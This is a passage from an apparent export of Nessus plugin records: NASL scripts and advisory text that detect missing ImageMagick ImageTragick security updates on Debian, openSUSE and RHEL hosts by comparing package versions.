The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91175);\n script_version(\"2.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n script_xref(name:\"DSA\", value:\"3580\");\n\n script_name(english:\"Debian DSA-3580-1 : imagemagick - security update (ImageTragick)\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Nikolay Ermishkin from the Mail.Ru Security Team and Stewie discovered\nseveral vulnerabilities in ImageMagick, a program suite for image\nmanipulation. These vulnerabilities, collectively known as\nImageTragick, are the consequence of lack of sanitization of untrusted\ninput. An attacker with control on the image input could, with the\nprivileges of the user running the application, execute code\n(CVE-2016-3714 ), make HTTP GET or FTP requests (CVE-2016-3718 ), or\ndelete (CVE-2016-3715 ), move (CVE-2016-3716 ), or read (CVE-2016-3717\n) local files.\n\nThese vulnerabilities are particularly critical if Imagemagick\nprocesses images coming from remote parties, such as part of a web\nservice.\n\nThe update disables the vulnerable coders (EPHEMERAL, URL, MVG, MSL,\nand PLT) and indirect reads via /etc/ImageMagick-6/policy.xml file. 
In\naddition, we introduce extra preventions, including some sanitization\nfor input filenames in http/https delegates, the full remotion of\nPLT/Gnuplot decoder, and the need of explicit reference in the\nfilename for the insecure coders.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=823542\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-3714\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-3718\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-3715\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-3716\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-3717\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/imagemagick\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2016/dsa-3580\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the imagemagick packages.\n\nFor the stable distribution (jessie), these problems have been fixed\nin version 8:6.8.9.9-5+deb8u2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:imagemagick\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/16\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"imagemagick\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"imagemagick-6.q16\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"imagemagick-common\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"imagemagick-dbg\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"imagemagick-doc\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libimage-magick-perl\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libimage-magick-q16-perl\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", 
prefix:\"libmagick++-6-headers\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagick++-6.q16-5\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagick++-6.q16-dev\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagick++-dev\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagickcore-6-arch-config\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagickcore-6-headers\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagickcore-6.q16-2\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagickcore-6.q16-2-extra\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagickcore-6.q16-dev\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagickcore-dev\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagickwand-6-headers\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagickwand-6.q16-2\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagickwand-6.q16-dev\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmagickwand-dev\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"perlmagick\", reference:\"8:6.8.9.9-5+deb8u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T12:30:25", "description": "This update for ImageMagick fixes the following issues :\n\nThe update disables various insecure coders 
[boo#978061] These fix\nissues tracked in CVE-2016-3714, CVE-2016-3715, CVE-2016-3716,\nCVE-2016-3717, CVE-2016-3718", "edition": 20, "cvss3": {"score": 8.4, "vector": "AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-09T00:00:00", "title": "openSUSE Security Update : ImageMagick (openSUSE-2016-569) (ImageTragick)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2016-05-09T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:perl-PerlMagick-debuginfo", "p-cpe:/a:novell:opensuse:ImageMagick-debuginfo", "p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-2-debuginfo", "p-cpe:/a:novell:opensuse:ImageMagick-devel-32bit", "p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-2-debuginfo-32bit", "p-cpe:/a:novell:opensuse:ImageMagick-devel", "p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-2-32bit", "p-cpe:/a:novell:opensuse:libMagick++-6_Q16-5-32bit", "p-cpe:/a:novell:opensuse:libMagick++-6_Q16-5-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libMagick++-6_Q16-5", "p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-2-debuginfo", "p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-2", "p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-2-debuginfo-32bit", "p-cpe:/a:novell:opensuse:ImageMagick-extra", "p-cpe:/a:novell:opensuse:ImageMagick-debugsource", "p-cpe:/a:novell:opensuse:ImageMagick-extra-debuginfo", "p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-2", "p-cpe:/a:novell:opensuse:ImageMagick", "cpe:/o:novell:opensuse:13.2", "p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-2-32bit", "p-cpe:/a:novell:opensuse:libMagick++-devel-32bit", "p-cpe:/a:novell:opensuse:libMagick++-6_Q16-5-debuginfo", "p-cpe:/a:novell:opensuse:perl-PerlMagick", "p-cpe:/a:novell:opensuse:libMagick++-devel"], "id": "OPENSUSE-2016-569.NASL", "href": "https://www.tenable.com/plugins/nessus/90981", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this 
plugin were\n# extracted from openSUSE Security Update openSUSE-2016-569.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90981);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n\n script_name(english:\"openSUSE Security Update : ImageMagick (openSUSE-2016-569) (ImageTragick)\");\n script_summary(english:\"Check for the openSUSE-2016-569 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for ImageMagick fixes the following issues :\n\nThe update disables various insecure coders [boo#978061] These fix\nissues tracked in CVE-2016-3714, CVE-2016-3715, CVE-2016-3716,\nCVE-2016-3717, CVE-2016-3718\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=978061\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ImageMagick packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagick++-6_Q16-5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagick++-6_Q16-5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagick++-6_Q16-5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagick++-6_Q16-5-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagick++-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagick++-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-2-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-2-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-2-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-2-debuginfo\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-2-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-PerlMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-PerlMagick-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/07\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ImageMagick-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ImageMagick-debuginfo-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", 
reference:\"ImageMagick-debugsource-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ImageMagick-devel-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ImageMagick-extra-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ImageMagick-extra-debuginfo-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libMagick++-6_Q16-5-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libMagick++-6_Q16-5-debuginfo-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libMagick++-devel-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libMagickCore-6_Q16-2-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libMagickCore-6_Q16-2-debuginfo-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libMagickWand-6_Q16-2-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libMagickWand-6_Q16-2-debuginfo-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"perl-PerlMagick-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"perl-PerlMagick-debuginfo-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"ImageMagick-devel-32bit-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libMagick++-6_Q16-5-32bit-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libMagick++-6_Q16-5-debuginfo-32bit-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libMagick++-devel-32bit-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libMagickCore-6_Q16-2-32bit-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libMagickCore-6_Q16-2-debuginfo-32bit-6.8.9.8-18.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libMagickWand-6_Q16-2-32bit-6.8.9.8-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libMagickWand-6_Q16-2-debuginfo-32bit-6.8.9.8-18.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ImageMagick / ImageMagick-debuginfo / ImageMagick-debugsource / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-06T13:46:05", "description": "An update for ImageMagick is now available for Red Hat Enterprise\nLinux 6 and Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nImageMagick is an image display and manipulation tool for the X Window\nSystem that can read and write multiple image formats.\n\nSecurity Fix(es) :\n\n* It was discovered that ImageMagick did not properly sanitize certain\ninput before passing it to the delegate functionality. A remote\nattacker could create a specially crafted image that, when processed\nby an application using ImageMagick or an unsuspecting user using the\nImageMagick utilities, would lead to arbitrary execution of shell\ncommands with the privileges of the user running the application.\n(CVE-2016-3714)\n\n* It was discovered that certain ImageMagick coders and\npseudo-protocols did not properly prevent security sensitive\noperations when processing specially crafted images. 
A remote attacker\ncould create a specially crafted image that, when processed by an\napplication using ImageMagick or an unsuspecting user using the\nImageMagick utilities, would allow the attacker to delete, move, or\ndisclose the contents of arbitrary files. (CVE-2016-3715,\nCVE-2016-3716, CVE-2016-3717)\n\n* A server-side request forgery flaw was discovered in the way\nImageMagick processed certain images. A remote attacker could exploit\nthis flaw to mislead an application using ImageMagick or an\nunsuspecting user using the ImageMagick utilities into, for example,\nperforming HTTP(S) requests or opening FTP sessions via specially\ncrafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file\nthat disables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT,\nand LABEL coders. If you experience any problems after the update, it\nmay be necessary to manually adjust the policy.xml file to match your\nrequirements. Please take additional precautions to ensure that your\napplications using the ImageMagick library do not process malicious or\nuntrusted files before doing so.", "edition": 31, "cvss3": {"score": 8.4, "vector": "AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-11T00:00:00", "title": "RHEL 6 / 7 : ImageMagick (RHSA-2016:0726) (ImageTragick)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2016-05-11T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:6.7", "p-cpe:/a:redhat:enterprise_linux:ImageMagick", "cpe:/o:redhat:enterprise_linux:7.4", "cpe:/o:redhat:enterprise_linux:7.7", "p-cpe:/a:redhat:enterprise_linux:ImageMagick-perl", "p-cpe:/a:redhat:enterprise_linux:ImageMagick-devel", "cpe:/o:redhat:enterprise_linux:7.5", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:ImageMagick-debuginfo", "cpe:/o:redhat:enterprise_linux:7.3", 
"p-cpe:/a:redhat:enterprise_linux:ImageMagick-c\\+\\+", "cpe:/o:redhat:enterprise_linux:7.2", "cpe:/o:redhat:enterprise_linux:7.6", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:ImageMagick-doc", "p-cpe:/a:redhat:enterprise_linux:ImageMagick-c\\+\\+-devel"], "id": "REDHAT-RHSA-2016-0726.NASL", "href": "https://www.tenable.com/plugins/nessus/91036", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:0726. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(91036);\n script_version(\"2.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/05\");\n\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n script_xref(name:\"RHSA\", value:\"2016:0726\");\n\n script_name(english:\"RHEL 6 / 7 : ImageMagick (RHSA-2016:0726) (ImageTragick)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"An update for ImageMagick is now available for Red Hat Enterprise\nLinux 6 and Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nImageMagick is an image display and manipulation tool for the X Window\nSystem that can read and write multiple image formats.\n\nSecurity Fix(es) :\n\n* It was discovered that ImageMagick did not properly sanitize certain\ninput before passing it to the delegate functionality. 
A remote\nattacker could create a specially crafted image that, when processed\nby an application using ImageMagick or an unsuspecting user using the\nImageMagick utilities, would lead to arbitrary execution of shell\ncommands with the privileges of the user running the application.\n(CVE-2016-3714)\n\n* It was discovered that certain ImageMagick coders and\npseudo-protocols did not properly prevent security sensitive\noperations when processing specially crafted images. A remote attacker\ncould create a specially crafted image that, when processed by an\napplication using ImageMagick or an unsuspecting user using the\nImageMagick utilities, would allow the attacker to delete, move, or\ndisclose the contents of arbitrary files. (CVE-2016-3715,\nCVE-2016-3716, CVE-2016-3717)\n\n* A server-side request forgery flaw was discovered in the way\nImageMagick processed certain images. A remote attacker could exploit\nthis flaw to mislead an application using ImageMagick or an\nunsuspecting user using the ImageMagick utilities into, for example,\nperforming HTTP(S) requests or opening FTP sessions via specially\ncrafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file\nthat disables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT,\nand LABEL coders. If you experience any problems after the update, it\nmay be necessary to manually adjust the policy.xml file to match your\nrequirements. 
Please take additional precautions to ensure that your\napplications using the ImageMagick library do not process malicious or\nuntrusted files before doing so.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2016:0726\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-3714\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-3715\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-3716\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-3717\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-3718\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ImageMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ImageMagick-c\\+\\+\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ImageMagick-c\\+\\+-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ImageMagick-debuginfo\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ImageMagick-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ImageMagick-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ImageMagick-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/11\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
